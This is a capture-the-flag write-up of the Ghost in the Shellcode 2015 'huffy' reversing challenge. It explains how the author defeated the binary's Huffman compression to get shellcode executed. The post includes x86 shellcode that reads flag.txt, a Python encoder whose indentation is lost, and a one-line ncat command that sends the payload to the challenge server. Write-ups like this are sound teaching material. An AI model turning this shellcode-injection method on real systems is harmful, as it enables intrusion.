# hxp

## Ghost in the Shellcode 2015: Reversing 300 "huffy"

### Gathering Information

Find the key!
File: File
Server: huffy.2015.ghostintheshellcode.com:8143

This was the only “official” reversing challenge in the 2015 edition of the Ghost in the Shellcode CTF. It was made available several hours before the end of the competition and worth 300 juicy points.

Executing the binary and entering some random text yields a lot of output:

$./huffy CWD: ~/CTF/2015_01_GitS/rev300_huffy AAAA Nibble Frequency ------ --------- 0 0.100000 1 0.400000 2 0.000000 3 0.000000 4 0.400000 5 0.000000 6 0.000000 7 0.000000 8 0.000000 9 0.000000 a 0.100000 b 0.000000 c 0.000000 d 0.000000 e 0.000000 f 0.000000 Read 5 bytes Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.100000 Two lowest frequencies: 0.100000 and 0.100000 Two lowest frequencies: 0.200000 and 0.200000 Two lowest frequencies: 0.400000 and 0.400000 Two lowest frequencies: 0.400000 and 0.800000 Breaking! 0 --0-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 1 --0-- 0x804c3c0 2 --0-- 0x804c258 --0-- 0x804c270 --0-- 0x804c288 --0-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 3 --1-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 4 --1-- 0x804c3a8 --1-- 0x804c3c0 5 --1-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 6 --1-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 7 --1-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 8 --1-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 9 --1-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 a --1-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 b --1-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 c --1-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 d --1-- 0x804c288 --0-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 e --1-- 0x804c270 --0-- 0x804c288 --0-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 f --1-- 0x804c258 --0-- 0x804c270 --0-- 0x804c288 --0-- 0x804c2a0 --0-- 0x804c2b8 --0-- 0x804c2d0 --0-- 0x804c2e8 --0-- 0x804c300 --0-- 0x804c318 --0-- 0x804c330 --0-- 0x804c348 --0-- 0x804c360 --1-- 0x804c378 --1-- 0x804c390 --0-- 0x804c3a8 --1-- 0x804c3c0 Encoding input... ASCII Encoded: 110110110110101010111 Binary Encoded: �j Executing encoded input... [1] 10542 segmentation fault (core dumped) ./huffy  Okay, let’s see what is going on here. It prints out the current working dir and asks for input. After being fed with data and pressing C-d to signal a EOF, the binary performs a frequency analysis on the nibbles of the input and prints out the result. Indeed, we find (including the “invisible” newline character) echo "AAAA" | hd 00000000 41 41 41 41 0a |AAAA.| 00000005  $P(X = ‘0’) = \frac{1}{10} = 0.1 \ P(X = ‘1’) = \frac{4}{10} = 0.4 \ P(X = ‘4’) = \frac{4}{10} = 0.4 \ P(X = ‘a’) = \frac{1}{10} = 0.1 \$ which is consistent with the relative frequencies displayed by the program. Afterwards we see that the two lowest frequencies are added iteratively to each other to construct a tree, which is eventually printed out. Sounds familiar? It should, together with the name of the challenge huffy it becomes obvious that this is a straightforward construction of a huffman tree. Thus, the tree not only gives us the heap addresses of the allocated tree nodes but also the bit sequences each input nibble will be substituted with. Note that the bit sequences are inverted as they are pointing from the leaf towards the root of the tree – looking at the binary representation (gracefully given to us on stderr) we can see the bit sequence our input AAAA\n is transformed to: echo "AAAA" | ./huffy 2>&1 | hd | tail -n 6 00000e30 31 31 30 31 31 30 31 31 30 31 31 30 31 30 31 30 |1101101101101010| 00000e40 31 30 31 31 31 0a 42 69 6e 61 72 79 20 45 6e 63 |10111.Binary Enc| 00000e50 6f 64 65 64 3a 0a db 6a 17 0a 45 78 65 63 75 74 |oded:..j..Execut| 00000e60 69 6e 67 20 65 6e 63 6f 64 65 64 20 69 6e 70 75 |ing encoded inpu| 00000e70 74 2e 2e 2e 0a |t....| 00000e75  Using the tree from above substituting each nibble by its associated bit sequence, we find: 'AAAA\n' = 0x41 0x41 0x41 0x41 0x0a = 0x4 0x1 0x4 0x1 0x4 0x1 0x4 0x1 0x0 0xa = 11 0 11 0 11 0 11 0 1010 10111 = 11011011 01101010 10111 = 0xdb 0x6a 0x17  After compressing the input the program prints Executing encoded input.... This probably is the reason why it segfauls afterwards (the byte sequence db 6a 17 does not form valid instructions). Verifying with gdb tells us that this assumption is correct. $ gdb ./huffy
gdb-peda$r >/dev/null Starting program: ~/CTF/2015_01_GitS/rev300_huffy/huffy >/dev/null AAAA �j Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] EAX: 0xf7fd5000 --> 0x176adb EBX: 0xf7fac960 --> 0xfbad2887 ECX: 0xf7fad878 --> 0x0 EDX: 0x0 ESI: 0x0 EDI: 0x804c3ee --> 0x0 EBP: 0xffffd088 --> 0x0 ESP: 0xffffc80c --> 0x804902e (<main+502>: mov eax,ds:0x804b080) EIP: 0xf7fd5000 --> 0x176adb EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] => 0xf7fd5000: fld TBYTE PTR [edx+0x17] 0xf7fd5003: add BYTE PTR [eax],al 0xf7fd5005: add BYTE PTR [eax],al 0xf7fd5007: add BYTE PTR [eax],al [------------------------------------stack-------------------------------------] 0000| 0xffffc80c --> 0x804902e (<main+502>: mov eax,ds:0x804b080) 0004| 0xffffc810 --> 0xf7facac0 --> 0xfbad2884 0008| 0xffffc814 --> 0x1 0012| 0xffffc818 --> 0x3 0016| 0xffffc81c --> 0xf7fac960 --> 0xfbad2887 0020| 0xffffc820 --> 0x0 0024| 0xffffc824 --> 0x0 0028| 0xffffc828 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0xf7fd5000 in ?? () gdb-peda$ x/20xb $pc 0xf7fd5000: 0xdb 0x6a 0x17 0x00 0x00 0x00 0x00 0x00 0xf7fd5008: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xf7fd5010: 0x00 0x00 0x00 0x00  To summarize: We feed payload into the program which is encoded using a huffman compression which then is executed by the program. As we also have a remote address of the binary this means we get a free shell as long as we are able to find an input string which gets compressed to shellcode (kinda weird, isn’t it?). ### Disabling the Compression Let’s recap a little bit of basic information theory: Shannon’s coding theorem tells us that a lower bound for any compression algorithm is the entropy of the input source in bits per symbol. We want the hufman compression to have as least impact on our input as possible such that it doesn’t damage the shellcode we’re feeding into the binary. To make huffman coding performing as bad as possible we thus need to maximize the entropy of the source. In order to achieve this, basic math tells us that each input symbol needs to be equally likely. The input symbols are the nibbles of the original data given to the binary. Let’s see what happens if we throw such a string into the binary: $ echo -n "\x01\x23\x45\x67\x89\xab\xcd\xef" | ./huffy
CWD: ~/CTF/2015_01_GitS/rev300_huffy
Nibble  Frequency
------  ---------
0   0.062500
1   0.062500
2   0.062500
3   0.062500
4   0.062500
5   0.062500
6   0.062500
7   0.062500
8   0.062500
9   0.062500
a   0.062500
b   0.062500
c   0.062500
d   0.062500
e   0.062500
f   0.062500

Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.062500 and 0.062500
Two lowest frequencies: 0.125000 and 0.125000
Two lowest frequencies: 0.125000 and 0.125000
Two lowest frequencies: 0.125000 and 0.125000
Two lowest frequencies: 0.125000 and 0.125000
Two lowest frequencies: 0.250000 and 0.250000
Two lowest frequencies: 0.250000 and 0.250000
Two lowest frequencies: 0.500000 and 0.500000
Breaking!
0 --0--> 0x9043258 --0--> 0x9043318 --0--> 0x9043378 --0--> 0x90433a8
1 --0--> 0x9043270 --0--> 0x9043330 --0--> 0x9043390 --1--> 0x90433a8
2 --0--> 0x9043288 --0--> 0x9043348 --1--> 0x9043390 --1--> 0x90433a8
3 --0--> 0x90432a0 --0--> 0x9043360 --1--> 0x9043378 --0--> 0x90433a8
4 --0--> 0x90432b8 --1--> 0x9043360 --1--> 0x9043378 --0--> 0x90433a8
5 --0--> 0x90432d0 --1--> 0x9043348 --1--> 0x9043390 --1--> 0x90433a8
6 --0--> 0x90432e8 --1--> 0x9043330 --0--> 0x9043390 --1--> 0x90433a8
7 --0--> 0x9043300 --1--> 0x9043318 --0--> 0x9043378 --0--> 0x90433a8
8 --1--> 0x9043300 --1--> 0x9043318 --0--> 0x9043378 --0--> 0x90433a8
9 --1--> 0x90432e8 --1--> 0x9043330 --0--> 0x9043390 --1--> 0x90433a8
a --1--> 0x90432d0 --1--> 0x9043348 --1--> 0x9043390 --1--> 0x90433a8
b --1--> 0x90432b8 --1--> 0x9043360 --1--> 0x9043378 --0--> 0x90433a8
c --1--> 0x90432a0 --0--> 0x9043360 --1--> 0x9043378 --0--> 0x90433a8
d --1--> 0x9043288 --0--> 0x9043348 --1--> 0x9043390 --1--> 0x90433a8
e --1--> 0x9043270 --0--> 0x9043330 --0--> 0x9043390 --1--> 0x90433a8
f --1--> 0x9043258 --0--> 0x9043318 --0--> 0x9043378 --0--> 0x90433a8
Encoding input...
ASCII Encoded: 0000100011000100011011101010001000111011111101110101110110010001
Binary Encoded:
�n�;�]�
Executing encoded input...
[1]    10361 done                              echo -n "\x01\x23\x45\x67\x89\xab\xcd\xef" |
10362 segmentation fault (core dumped)  ./huffy


Awesome! The algorithm is unable to compress our input any further, effectively turning the huffman compression into a simple substitution. Inverting the bits (remember that the list above is starting at the leaves) we obtain the following substitution table:

0 -> 0
1 -> 8
2 -> c
3 -> 4
4 -> 6
5 -> e
6 -> a
7 -> 2
8 -> 3
9 -> b
a -> f
b -> 7
c -> 5
d -> d
e -> 9
f -> 1


This makes the rest pretty easy: Take the shellcode, append it such that all nibbles are equally likely in the whole input source and do the inverse substituation. We can write a small python script which does that for us:

#!/usr/bin/python

import sys
import binascii

# Simple x86 "cat flag.txt" shellcode
s = "eb37b0050fb6c05b31c9884b08cd8089c3b0030fb6c031d2b68029d489e1cd8089c2b0040fb6c0b3010fb6db89e1cd80b0010fb6c031dbcd80e8c4ffffff666c61672e74787441"

c = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
i = 0
m = 0

for i in range(len(s)):
c[int(s[i], 16)] += 1

for i in range(len(c)):
if c[i] > m:
m = c[i]

for i in range(len(c)):
h = "%x" % i
s += h * (m - c[i])

for c in s:
if i % 2 == 0: sys.stdout.write("\\x")
if c == "0": sys.stdout.write("0")
if c == "8": sys.stdout.write("1")
if c == "4": sys.stdout.write("3")
if c == "c": sys.stdout.write("2")
if c == "2": sys.stdout.write("7")
if c == "a": sys.stdout.write("6")
if c == "6": sys.stdout.write("4")
if c == "e": sys.stdout.write("5")
if c == "9": sys.stdout.write("e")
if c == "5": sys.stdout.write("c")
if c == "d": sys.stdout.write("d")
if c == "3": sys.stdout.write("8")
if c == "b": sys.stdout.write("9")
if c == "7": sys.stdout.write("b")
if c == "f": sys.stdout.write("a")
if c == "1": sys.stdout.write("f")


The rest is a matter of

\$ ./pwn.py | ncat huffy.2015.ghostintheshellcode.com 8143


which gives us a flag worth 300 points.

As a summary: We’ve just solved a reversing binary without ever having to look at the disassembly itself. The debug prints make it really obvious how to solve the task. On the other hand, playing a WAV file on an oscilloscope (as demanded in a different challenge) was considered to be worth only 200 points – not very balanced.